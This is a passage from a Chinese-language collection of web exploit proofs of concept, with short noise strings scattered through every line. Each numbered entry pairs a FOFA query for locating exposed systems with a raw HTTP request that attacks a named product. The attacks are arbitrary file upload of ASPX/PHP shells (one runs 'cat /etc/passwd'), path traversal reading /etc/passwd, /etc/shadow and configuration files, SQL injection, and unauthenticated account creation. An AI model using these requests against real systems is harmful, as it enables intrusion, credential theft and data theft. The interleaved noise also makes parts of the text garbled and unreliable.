* v6 b! l4 b4 h% G% Y
9 k& l2 `- S' Q, n/ |<?xml version="1.0" encoding="utf-8"?>2 u' v/ s) D0 O7 l
<soap:Envelope xmlns:xsi="2 _5 |' C Y9 O3 k. k2 Q( h
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema") f9 u1 y5 j* s2 F
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. ^1 }/ N \1 J" d: H
<soap:Body>5 j* o# {7 s" u9 z/ G6 x
<UploadResume xmlns="http://tempuri.org/">
! F' o1 v' D* w' w' l<ip>1</ip>
7 u% I" F- z5 Q0 m4 b# _<fileName>../../../../dizxdell.aspx</fileName>
# x) f8 _& B/ U+ C/ F7 F<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
# O7 ~! ?+ m3 K8 H" w" D* k6 N<tag>3</tag>
4 Z% T: ?+ @1 i0 T, R. w</UploadResume>, i. X; O! V3 u! B
</soap:Body>" \ y3 G/ j& W% G
</soap:Envelope>
- y' v) ], Y+ \
, f! \) T* e) J: [4 j3 D6 v% z1 H% c- v j' y; Z, ]
http://x.x.x.x/dizxdell.aspx2 d1 x2 e/ P. d/ |7 n- |3 j, W
* }% |5 L- v9 | f) H0 g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传7 a+ `5 ?4 @& R
FOFA: app="和丰山海-数字标牌"
! \9 {0 Y1 n, \8 UPOST /QH.aspx HTTP/1.15 z0 h1 C( ?, {4 x F
Host: x.x.x.x# I2 o3 }/ [( [! C# \" |) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.08 M$ F5 p A6 Q! j, c
Connection: close7 F: a7 r( ^8 v0 E4 X; _
Content-Length: 583
) c! s, g3 \5 V& ~- k- |3 rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey0 D" b5 E* y: {. Y2 D% R( b# c
Accept-Encoding: gzip
. |1 t; L& C# ^& r' T& x
2 f* Y% H5 A% n------WebKitFormBoundaryeegvclmyurlotuey( X8 }# c9 J7 \* e! p3 s! x/ ]2 r d
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"/ @7 [# j# T1 I4 ~6 t) k: ]9 _& o. x
Content-Type: application/octet-stream4 Q: _7 ~9 X9 k5 X
t/ O5 G% w6 @+ k, p& k, d
<% response.write("ujidwqfuuqjalgkvrpqy") %>
( u; L1 {6 `* `------WebKitFormBoundaryeegvclmyurlotuey
# j7 D) I) h; p5 L1 d1 R: }Content-Disposition: form-data; name="action"
/ W, A# H& ^& _4 ~& Z8 _1 c- I6 `, B* G, N9 B, d- G- D) i3 q
upload
4 W6 l+ U2 H/ [% B3 s" q' y------WebKitFormBoundaryeegvclmyurlotuey5 t# f, N [0 Z7 Q( V; q
Content-Disposition: form-data; name="responderId"
. N- w% H2 J `5 J. ]6 }5 I! K9 [7 a3 |7 g4 P" Z8 e
ResourceNewResponder4 A. M+ U+ p. w8 s2 B% m
------WebKitFormBoundaryeegvclmyurlotuey
7 ?. o M/ t+ R R, S2 `' FContent-Disposition: form-data; name="remotePath"9 h( E+ C, [* x/ C' N: ~& _
, d% h+ P) g. s9 k, R
/opt/resources
- A- k) a3 j, D! y. r------WebKitFormBoundaryeegvclmyurlotuey--
: ~4 w" J1 o* C0 c' b& K" C3 ~% K r0 T/ |6 d
, {& R. A+ \9 I: B& m0 M. \) i# C
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
/ `( M- d: s$ W, D: v9 |0 [
! h0 E2 _9 E9 w+ ~$ b* f163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 C) M; G5 Y, o* E. S: w
FOFA: icon_hash="-795291075"# T# t/ s7 u$ h+ ^
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
# ?1 v9 [ h7 j" I" LHost: x.x.x.x2 U9 R( I' X: [5 G: b) N7 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. v0 Y: A1 @9 K5 d" V) [1 [, k2 @! D% YConnection: close
+ R0 s2 N2 O, oContent-Length: 293
# ^* A% r8 U& Q0 W5 Z/ W1 u6 YAccept: */*
+ Y$ s/ b: \0 |& B9 G3 ] a' qAccept-Encoding: gzip, deflate" N' ?5 L/ S: _* A# P; [7 Q0 U
Accept-Language: zh-CN,zh;q=0.9" O2 A6 Z) C' X, U- ?3 T
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
& D2 Z5 g/ z! v0 m
4 Y) `6 k5 l1 o2 I, c( c------iiqvnofupvhdyrcoqyuujyetjvqgocod4 t$ F9 u ^& c# L4 Q
Content-Disposition: form-data; name="name". I2 X2 h# Q1 x$ f: t) m
6 B; O+ s1 a' b4 g; q1.php
& \ M# B7 z" F+ }------iiqvnofupvhdyrcoqyuujyetjvqgocod; A$ B |7 S: b+ N5 J6 U) ?
Content-Disposition: form-data; name="upfile"; filename="1.php"
0 ^2 p2 b# ^% d! y1 @8 R1 qContent-Type: image/jpeg) ^0 ?* \" U- q* K
. V; ?6 ?3 S! ?
rvjhvbhwwuooyiioxega; ?: `$ i+ d; Y0 W/ I9 z) s, m8 V
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
" M9 j! k7 {8 u7 i2 W, U' O! M; O; b/ f- E
" x2 w/ e: W6 g1 k& R
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传; @( |* r& L, J( j9 Y
FOFA: title="智慧综合管理平台登入"
% [: S+ V# ?8 y- z* VPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
$ c/ t* u# @: ]* ]" iHost: x.x.x.x
! @, @& U6 ]1 V. T" b0 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
5 U4 n: B, L. [- P% T+ gContent-Length: 288
b6 Q+ [* ~1 o' lAccept: application/json, text/javascript, */*; q=0.01
( R/ n: J( D0 w MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
$ L- }. A0 l/ _, z) f) TConnection: close
" b' i! H# Z$ C \- i: fContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
% x# ^8 @$ M: C8 hX-Requested-With: XMLHttpRequest
+ R2 _: C6 T c5 ~! BAccept-Encoding: gzip
3 Y4 G$ B2 M. S5 Q0 @) W) [' }
: |5 c1 E4 }/ q6 V1 b------dqdaieopnozbkapjacdbdthlvtlyl4 w3 }# m. K7 @5 V/ p
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
3 H3 L& T3 m& o2 f0 u# x7 IContent-Type: image/jpeg
( x. g4 I# X4 g7 s5 k
$ G/ o+ g9 `$ R) F<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 v0 X, P# s$ ?- V------dqdaieopnozbkapjacdbdthlvtlyl--- J1 B& h) J7 i! h
9 V% X- K6 k1 ?) m& N; h
: Y& k3 j! `7 l! p; thttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx% @0 M; D: d' A( h6 G$ f
0 d. ^, X5 e! O/ Y$ Z165. OrangeHRM 3.3.3 SQL 注入
1 v1 m i/ f0 ]) \# ~CVE-2024-36428
1 k0 f3 N6 V0 i5 x) RFOFA: app="OrangeHRM-产品"
& }5 ]- I& p4 F5 aURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))" H, I" G+ z. l2 ~
! l* e: G& L9 [
8 P, L0 U, l& e- k. k
166. 中成科信票务管理平台SeatMapHandler SQL注入* v7 h- o9 i2 W2 P/ y; P3 R0 I D- U
FOFA:body="技术支持:北京中成科信科技发展有限公司"
0 [( r! A$ p- _, ^1 jPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
N) |+ C( ?. uHost:
( w- ^, o F- `8 U2 gPragma: no-cache. B% n3 u+ x2 @2 u. n* ?* g. U
Cache-Control: no-cache/ ^. ]) g# W% `6 q$ _3 }7 B
Upgrade-Insecure-Requests: 1
! u/ Y9 U6 i0 ?$ [8 w; a3 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
8 C c, l R. q) N& YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: d: i" b0 W8 h# Z% L d
Accept-Encoding: gzip, deflate
9 F% w, e1 y9 l% V8 qAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' O+ \% F" r. u& fCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE1 u6 Z1 ?. @ s$ {$ \$ ?3 U+ J
Connection: close
Y0 N, H) d" X! g2 P: Q$ j, Y$ RContent-Type: application/x-www-form-urlencoded
( T$ C4 i$ f1 m4 \Content-Length: 89
7 @' \* ~5 }+ G2 @8 k7 }8 _+ K6 Y) Q& X/ j: d6 p ]2 a
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE0 m7 @& F& b5 _5 b7 @; c2 D
1 R8 Q/ l* e) ^: }$ g5 U6 s
, I P* T4 g8 i+ o8 I$ C
167. 精益价值管理系统 DownLoad.aspx任意文件读取
+ L9 i0 t0 A* ~& [FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"5 Q" V0 L' {: {: N7 M. s
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.13 s0 C! f F8 s. G, l! k
Host:
: T' a9 L/ K0 K$ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 M3 O# o, A( b: m& H- x
Content-Type: application/x-www-form-urlencoded
) i) j+ p0 B1 j$ U3 ^( @' @Accept-Encoding: gzip, deflate
7 t# R' G; }! Q) l$ z: GAccept: */*2 S2 [: E3 i. k0 w
Connection: keep-alive! ~' w& k% q9 K7 u
8 p4 \: h# l' v$ |+ G* N; F
# P: U: q8 u" b- ]# }
168. 宏景EHR OutputCode 任意文件读取
) z- |3 E- B* w7 H! x) u1 R8 rFOFA:app="HJSOFT-HCM"
# d) L& q& S2 iGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
8 `! {# Z& M/ [! ^# bHost: your-ip# P0 l9 O6 e9 \) N. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$ g, _; c( {) \ m2 E I B P
Content-Type: application/x-www-form-urlencoded
. I; c v& c6 w- K3 VConnection: close" O( d' e+ v. S3 }
' V( L- |9 i5 h$ p8 ^8 n+ }
% B8 f# m0 K3 j
8 B4 K9 g6 q3 o/ [169. 宏景EHR downlawbase SQL注入! f2 c* [% b! g# D7 e T
FOFA:app="HJSOFT-HCM"8 }! s" s6 i* t' V1 D
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
& f$ `& L% x1 g5 s( u: Q$ IHost: your-ip1 d2 |# \3 M# Z) G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) j. U; L' |) t r+ R* H9 [/ S
Accept: */*
+ Z& b: H% v8 Y0 v& w, lAccept-Encoding: gzip, deflate4 Y- q: U9 q2 i
Connection: close
1 b0 T6 Q% G# M" w, o. v
9 n0 C( n1 i& x ^4 r* p) i' K4 V# J3 G3 Z: U
6 N% \4 B4 ~* Z9 {2 a& }( i
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
, A, d4 W/ [' @FOFA:body="/general/sys/hjaxmanage.js"& E: F7 h% F) V( z* l# j
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.14 [# T1 _- Z" E& Q" t# a# Q
Host: balalanengliang
% d" j% U: r- X+ q% q2 HUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' |1 B" B6 ^' n$ ]9 l9 `+ C3 A; aContent-Type: application/x-www-form-urlencoded
. a7 U5 [4 ?, d, R( p* D. G
; Z: }1 ^- I: _6 Pfilename=../webapps/ROOT/WEB-INF/web.xml
) h6 F/ j, D8 T( T s1 B
, A/ H& g/ z( T j1 f9 L) M" ^4 [: N3 a& ~7 P; W3 h" A
171. 通天星CMSV6车载定位监控平台 SQL注入# ` F% l# {/ ?9 I; t; a: @9 |% E
FOFA:body="/808gps/"1 H9 _! c4 K$ d. B1 j
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.18 h% X D% w5 C7 w7 Z# U! h
Host: your-ip* T) J8 u/ ^# Y5 |3 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0% d8 Z# @. q0 p8 M0 I% D: k4 O8 u
Accept: */*9 D# G5 J8 _8 N( M* n5 Q; b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- u- O1 }; G. e# ?Accept-Encoding: gzip, deflate
8 y; |* ]8 v) S5 V0 Q$ qConnection: close
9 K9 m: |- U3 `. u* t
" V, W: D" P# D W3 T" o
% [9 h" V5 j, Z. q& Y2 i8 G. i; x) l; h% i% n$ U3 _1 p6 k
172. DT-高清车牌识别摄像机任意文件读取 H5 E$ S0 L) I/ C8 j
FOFA:app="DT-高清车牌识别摄像机"
$ h7 t: Q& M$ A7 q9 @* rGET /../../../../etc/passwd HTTP/1.18 J% G6 i8 j% ?* s7 |1 n
Host: your-ip8 e* {2 l }8 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& u+ B q [& E0 n) ~
Accept-Encoding: gzip, deflate( t& l. i f+ N* W$ v! z2 ]0 s
Accept: */*
6 j1 t7 t8 E/ Y9 M7 e6 G" h8 rConnection: keep-alive
8 I- F& ^, b- T% ^+ ^* K
, u2 V: D! H5 B& ]* Q- @0 Q3 E- f2 ?0 w) k' |4 F% w& F" K
. R1 C7 ]! Y* H173. Check Point 安全网关任意文件读取
. b4 w8 e! G, ZCVE-2024-24919$ S0 l1 b& L( Q1 b$ z4 A
FOFA:app="Check_Point-SSL-Network-Extender"
; T0 i8 I3 v. P+ sPOST /clients/MyCRL HTTP/1.11 `* G$ O. S. b1 t! C
Host: your-ip# s. K0 x! G- y, r
Content-Type: application/x-www-form-urlencoded
$ \) N0 r2 ~! A: r d9 r. W: a8 f7 h' d0 g& H
aCSHELL/../../../../../../../etc/shadow; ~/ j7 S5 U A' [2 Z
% L0 X/ m9 i% h' y
, s+ z0 M( l+ m* C/ t; N1 C* K
$ [ ^: O$ ]; F( e* t o' w2 O174. 金和OA C6 FileDownLoad.aspx 任意文件读取
0 l/ H8 N0 f1 B3 G( k' hFOFA:app="金和网络-金和OA". P# H+ j' E; [/ m3 X7 d" |; s9 e
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* q" W2 ~7 V1 W& ^% H' k
Host: your-ip( F9 k1 W. C, j% Y7 r7 `6 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) m0 K& o% J7 u. @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% ^3 ^) C4 w3 Q" o4 |
Accept-Encoding: gzip, deflate, br
" W3 b9 Z' E2 Q4 m2 ^5 A( SAccept-Language: zh-CN,zh;q=0.97 o7 H l2 ~; q' K- O0 M
Connection: close) ^, R6 `& S G- l3 B
& I- j4 ?! Y; T9 A" x& ~6 s
) m: q0 l) ] f% i6 `
' R5 @( m+ T9 n8 ^175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- x+ \$ P) M. }9 Y
FOFA:app="金和网络-金和OA"8 L/ }8 T/ i$ N8 G5 K" U: K: ^
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.16 v) k+ g% e: A
Host:
1 Z& W/ u. b( {0 n4 ^% XUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 Y. w: K+ X0 T' y2 c0 w: dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 R! O; R3 F: c+ S2 F. K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ a0 |5 r. i/ {
Accept-Encoding: gzip, deflate7 V; X; E8 j" P8 }7 k9 j. W
Connection: close
% J0 X9 F6 q! B- w1 vUpgrade-Insecure-Requests: 15 d8 u4 f+ w& X& O. I9 x
, T" P5 U* e, I8 s8 P$ r+ f
0 m8 A/ @8 t, M% I0 X3 k: k176. 电信网关配置管理系统 rewrite.php 文件上传
, L+ U: I' M7 b8 mFOFA:body="img/login_bg3.png" && body="系统登录"
' w6 b; q. s% C# S1 b; JPOST /manager/teletext/material/rewrite.php HTTP/1.16 L7 u* V! M4 o3 @' D! ^" U( s+ Y
Host: your-ip9 Q8 n6 i0 A# [ \" l) p; f: u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) t+ K# L& q. g/ p1 [/ V& _1 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT# }% j: @8 V S8 q- a0 u
Connection: close
- X2 h* Z9 a# s* a8 i5 m7 O& q* V: h6 _! T; m
------WebKitFormBoundaryOKldnDPT
! l9 u! V# Y/ F0 y1 m; s5 jContent-Disposition: form-data; name="tmp_name"; filename="test.php"
2 f3 O4 Z* t/ Z4 OContent-Type: image/png
0 z. h- ?" e, Z9 } ; ~6 v3 ]) P7 l
<?php system("cat /etc/passwd");unlink(__FILE__);?>+ `9 T) [3 B: r' U- R
------WebKitFormBoundaryOKldnDPT
" V3 Z9 }5 x0 H U$ r/ b0 H% h6 ~; aContent-Disposition: form-data; name="uploadtime"
9 n5 [. T- X8 v% {. D
2 @3 a* j) v0 E0 J$ l, R# Z4 n 6 \8 d' v+ | v# D6 W* O+ K5 V* q3 c$ h
------WebKitFormBoundaryOKldnDPT--
! F! _& H" b5 J* q6 s t
& N2 E( E: F& m) j5 u, `) D4 r) o; T( Y. }9 y$ ~) J+ q% p6 M( u& O
* B2 k3 D7 [. \; q5 M1 n177. H3C路由器敏感信息泄露
2 t' d f# v' P/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg! k1 h3 q$ f8 t5 }- ?' Y
/userLogin.asp/../actionpolicy_status/../M60.cfg
# l9 S3 G0 O! x4 p6 U7 E; \4 j/userLogin.asp/../actionpolicy_status/../GR8300.cfg
# w0 E& |4 ^4 y- \3 E/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 K( Y$ U9 u" _: C- t/ R* n
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 W% |9 x9 A) p! B, t/userLogin.asp/../actionpolicy_status/../GR2200.cfg- q. V5 ]8 `6 ~ K' T
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg- q/ S# o2 c* P0 m& y& I; Q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' ]' f; y6 J" I
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
' v. M! {5 n1 s$ E1 z8 U; j/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
6 U$ q- p! \0 b9 f; _ i0 w/userLogin.asp/../actionpolicy_status/../ER5200.cfg, [9 H8 L m) D6 F- ~! J9 c8 A* `9 [
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
' l5 ~5 [( j7 I3 I# V: ]0 g% [/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg- g2 @2 y1 D; [3 }- [1 J( E" ?: T
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
: x. B0 j' w/ A* G/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg9 E% `4 u5 s1 y
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
3 Y2 j; S, h; n, g* U/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
! Y1 G5 v" P7 M: e8 H/userLogin.asp/../actionpolicy_status/../ER3108G.cfg+ j4 L7 h9 C0 i& v5 l) T9 q3 {
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg; R+ H& G v3 t1 L$ S# u
/userLogin.asp/../actionpolicy_status/../ER3100.cfg* ` Y: N( }9 J ?8 N5 ^) k
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
: \7 q, i: Q$ ?2 |) o9 u; X7 F- p( M" G# I% g/ `
/ }7 v/ m z+ }: U% J2 N
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
% q* f: i/ j6 r: v8 mFOFA:header="/selfservice"
6 G7 o; T; F3 K: Z d# T+ N6 FPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.17 q( v; b! S$ Q* x, R: U
Host:* I3 }4 |, g# i1 ^# } e/ n, z" Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ i( V0 `" ~: w
Content-Length: 252! v. R7 }# z: G, p
Accept-Encoding: gzip, deflate
9 j9 }& C3 x9 ?+ k3 ^Connection: close
1 a4 L2 P: _1 F; U7 DContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
W p$ D. z: D& c, c-----------------aqutkea7vvanpqy3rh2l
) w+ b7 T7 j9 q6 W0 i! bContent-Disposition: form-data; name="12234.txt"; filename="12234"
6 E3 k6 h$ j. X6 W9 l! f* y& A5 Y8 FContent-Type: application/octet-stream v: ~ e+ y9 a$ Q3 j. d
Content-Length: 255: E6 d8 p3 I$ E8 o: O6 C
5 m" o/ N/ a! t9 `' B) T6 I12234; h9 G8 q- t0 }
-----------------aqutkea7vvanpqy3rh2l--6 g7 P8 X" M0 i* { e+ a' N. y
; |4 l! J- X& U" H" Z( _
3 z( f# B: j) L& G5 p: VGET /imc/primepush/%2e%2e/flex/12234.txt3 a0 j/ }4 |& t4 c- b. x! J
A2 w& p: U- I n H N( o7 M4 M7 J
, a6 B* w1 c2 z5 ~179. 建文工程管理系统存在任意文件读取! }. ?* c8 j8 K7 ~$ V1 \' E
POST /Common/DownLoad2.aspx HTTP/1.1
4 {* _) H3 e' nHost: {{Hostname}}
1 u2 j( ?, c6 ^" [& B0 Z" FContent-Type: application/x-www-form-urlencoded
, ?& d7 I5 [, f' UUser-Agent: Mozilla/5.0
d# y: @6 n, S# b
9 Q8 _& h8 {' W" v, s' P( wpath=../log4net.config&Name=* n# ?; m4 T' V& a, M& x
9 q% t. [9 P" z; D2 u% D& ]
6 S" N) x w: P* M4 x5 ^
180. 帮管客 CRM jiliyu SQL注入2 X6 J4 A0 l% S
FOFA:app="帮管客-CRM"- V6 T+ M$ i' N) e
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1' v3 V/ C! g( f) o
Host: your-ip
; h3 F0 L4 x$ f" q. TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% Z7 w9 k |7 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 V$ e9 h* s0 h0 K
Accept-Encoding: gzip, deflate
# x0 \ ^& r d8 Q6 wAccept-Language: zh-CN,zh;q=0.94 s# V7 _- Y7 a9 T7 S
Connection: close t* L$ ^% F2 u* e
2 a! @! g8 ~! K0 V
" h9 \' }/ u+ Q9 s) O* k# N
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入4 H" I6 m! ], @! `" C5 `2 [
FOFA:"PDCA/js/_publicCom.js"6 y0 v' K" o- R1 g
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Z) h/ ^, [0 g: ^6 {7 ~' x. tHost: your-ip
% _' z J0 q5 @; D# VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ `/ h0 X9 F, q1 r; H# P2 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 }( j/ W% }: r" L+ T9 A" Z+ ?& i! kAccept-Encoding: gzip, deflate, br$ H' `- J& H# o% _" k
Accept-Language: zh-CN,zh;q=0.9: f: V" E, J4 d6 n' T, v3 e8 f$ _3 K
Connection: close
2 i) {* `4 J! R& AContent-Type: application/x-www-form-urlencoded
8 E; T% s0 n2 j Y4 u
7 u. O- F {3 s4 C- p* G
( `5 Z$ h4 y. {3 X! X# Z' A. Haction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 H+ c/ g5 E- Z# ^
+ I% v* A* D) A" m
z. ?/ S$ F: t1 Q x& h182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) ~! m" Y* |: z9 k7 ]FOFA:"PDCA/js/_publicCom.js"
7 P+ y$ i5 a" M; O5 X9 kPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
! m6 @, z6 m) ]0 P$ Y# {7 V' I; H7 _Host: your-ip
; ]1 j7 [% H, q0 ]# {6 S) }: ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) C# J1 z; n, R# u( n9 c: V& {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 f. ^! C: N9 ]% x
Accept-Encoding: gzip, deflate, br+ c* F& o a& B8 d
Accept-Language: zh-CN,zh;q=0.9
/ N0 H( H; A! P$ J) KConnection: close
" }1 S6 |5 Q s' G$ l$ q2 bContent-Type: application/x-www-form-urlencoded
9 w, ]' |- ?( r* N
' H; G. d E9 G( K
. [+ W9 \7 X$ m- ]# g9 T9 [) eusername=test1234&pwd=test1234&savedays=1
9 {+ U( M" P* l9 J- c
6 o' w% w0 b4 F' G" X9 T7 e8 O, V
0 Q5 C! d4 {& F% _183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入" E7 C1 g& V; [0 [" {5 _
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
% J. p+ }0 X5 A( J0 a k$ q: IGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
W( Y$ Z$ G j, `Host: your-ip! O& j$ O, X P& ]9 e4 l( M
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, U; \% ~7 e( w* o ^- I$ r
Accept-Charset: utf-8
- S$ f( Q0 x7 {8 b3 h! G. V* eAccept-Encoding: gzip, deflate2 n: m3 G3 h. [- d
Connection: close
4 T; |: w$ Z o9 N. L! l% ]' ]* ]* ?, D
' a T4 v# X# x; W4 g: u184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加: i! U% S1 R ~ E% q
FOFA:server="SunFull-Webs"
1 o/ {9 m& X" ^ Y$ cPOST /soap/AddUser HTTP/1.17 U9 r' P4 s. x0 ~. W
Host: your-ip
, v9 F/ J" L1 S8 b+ BAccept-Encoding: gzip, deflate* T% r3 w" ~: V7 ^) F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( |4 ~' z) f0 i4 A* e
Accept: application/xml, text/xml, */*; q=0.01: C* T8 o4 E5 X; j2 ]+ y) i
Content-Type: text/xml; charset=utf-8
3 u: l8 S# l- [$ m( sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' Z1 {9 `! |) |2 N1 Y: |+ j
X-Requested-With: XMLHttpRequest
